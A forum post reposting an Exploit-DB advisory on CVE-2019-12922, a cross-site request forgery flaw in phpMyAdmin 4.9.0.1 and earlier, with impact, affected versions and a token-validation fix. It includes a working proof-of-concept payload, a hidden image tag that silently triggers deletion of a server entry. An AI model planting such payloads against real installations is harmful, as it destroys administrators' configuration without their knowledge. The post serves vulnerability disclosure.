Jump to content

phpmyadmin vulnerability(CVE-2019-12922)


Koray

Recommended Posts

  • Silver

phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.

Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.

PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />

BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.

SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.


Source: https://www.exploit-db.com/exploits/47385

  • Love 1
Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now

Announcements



×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.